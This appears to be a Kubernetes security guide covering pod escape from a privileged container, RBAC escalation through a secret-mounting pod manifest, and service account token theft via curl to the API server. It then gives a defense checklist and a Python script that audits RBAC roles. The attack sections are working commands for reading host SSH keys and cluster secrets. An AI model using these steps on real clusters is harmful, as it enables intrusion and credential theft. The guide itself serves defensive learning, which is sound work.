Key Takeaways

  • Pod escape can lead to node compromise and lateral movement.
  • RBAC misconfigurations are the #1 cause of K8s breaches.
  • Secrets in etcd are base64 encoded, not encrypted by default.
  • Service accounts with cluster-admin can compromise everything.

Kubernetes powers 80%+ of containerized workloads. A single misconfigured RBAC rule or privileged pod can give attackers complete cluster control. This guide covers every attack path.

Attack Surface Overview

Attack #1: Pod Escape via Privileged Container

# Check if running privileged
cat /proc/1/status | grep Cap
# CapEff: 0000003fffffffff = ALL capabilities = privileged!

# Mount host filesystem (assumes the host root disk is /dev/sda1; check with lsblk)
mkdir /mnt/host
mount /dev/sda1 /mnt/host

# Access host SSH keys
cat /mnt/host/root/.ssh/id_rsa

# Escape to host
chroot /mnt/host /bin/bash

Attack #2: RBAC Privilege Escalation

# List your permissions
kubectl auth can-i --list

# Dangerous permissions:
# - create pods (can mount secrets)
# - create/patch roles (can escalate)
# - list secrets (credential theft)

# If you can create pods, mount all secrets:
apiVersion: v1
kind: Pod
metadata:
  name: pwn
spec:
  containers:
  - name: pwn
    image: alpine
    volumeMounts:
    - name: all-secrets
      mountPath: /secrets
  volumes:
  - name: all-secrets
    projected:
      sources:
      - secret:
          name: target-secret  # placeholder: Kubernetes has no "*" wildcard here, each secret needs its own entry

Attack #3: Service Account Token Theft

# By default every pod gets a service account token mounted here
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use it to access API
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

curl -k -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

Defense Checklist

  • Disable automountServiceAccountToken when not needed
  • Use Pod Security Standards (restricted)
  • Enable RBAC with least privilege
  • Encrypt secrets at rest in etcd
  • Implement Network Policies
  • Enable audit logging
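To act on the least-privilege item, here is an added audit script (not part of this guide) that reads the JSON `kubectl get clusterroles,roles -A -o json` prints and flags the dangerous permissions listed under Attack #2 plus full wildcards; the role names and rules in SAMPLE are constructed test data.

```python
"""Flag RBAC rules that grant the dangerous permissions listed above.

Input is the JSON that `kubectl get clusterroles,roles -A -o json` prints.
SAMPLE is a constructed document so the script runs offline.
"""
import json

# (apiGroup, resource, verb) -> why it matters for the attacks above.
DANGEROUS = {
    ("", "pods", "create"): "create pods: can mount secrets or run privileged",
    ("", "secrets", "get"): "read secrets: credential theft",
    ("", "secrets", "list"): "list secrets: credential theft",
}
for _res in ("roles", "clusterroles"):
    for _verb in ("create", "patch"):
        DANGEROUS[("rbac.authorization.k8s.io", _res, _verb)] = f"{_verb} {_res}: privilege escalation"

def _granted(wanted, values):
    """A rule entry matches when it names the value or uses the '*' wildcard."""
    return "*" in values or wanted in values

def audit_role(role):
    """Return (role, apiGroup, resource, verb, reason) for each risky rule."""
    findings, name = [], role["metadata"]["name"]
    for rule in role.get("rules", []):
        groups, resources = rule.get("apiGroups", []), rule.get("resources", [])
        verbs = rule.get("verbs", [])
        if "*" in groups and "*" in resources and "*" in verbs:
            findings.append((name, "*", "*", "*", "full wildcard: equivalent to cluster-admin"))
            continue
        for (group, resource, verb), reason in DANGEROUS.items():
            if _granted(group, groups) and _granted(resource, resources) and _granted(verb, verbs):
                findings.append((name, group, resource, verb, reason))
    return findings

def audit(doc):
    """Audit every role in a kubectl list document; returns all findings."""
    return [f for role in doc.get("items", []) for f in audit_role(role)]

# Constructed sample: an over-privileged CI role and a benign read-only role.
SAMPLE = json.loads("""{"items": [
 {"metadata": {"name": "ci-deployer"}, "rules": [
   {"apiGroups": [""], "resources": ["pods", "secrets"], "verbs": ["get", "list", "create"]},
   {"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["roles"], "verbs": ["patch"]}]},
 {"metadata": {"name": "pod-reader"}, "rules": [
   {"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}]}]}""")

for _name, _group, _resource, _verb, _reason in audit(SAMPLE):
    print(f"{_name}: {_verb} {_resource} in '{_group or 'core'}' -> {_reason}")
```

Pipe real cluster output through `json.load` into `audit()` to get the same tuples for every Role and ClusterRole; bindings that attach these roles to service accounts are the next thing to review.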

Frequently Asked Questions

How do I scan for K8s vulnerabilities?
Use kube-hunter (penetration testing), kube-bench (CIS benchmarks), trivy (container scanning), and kubeaudit (RBAC analysis).
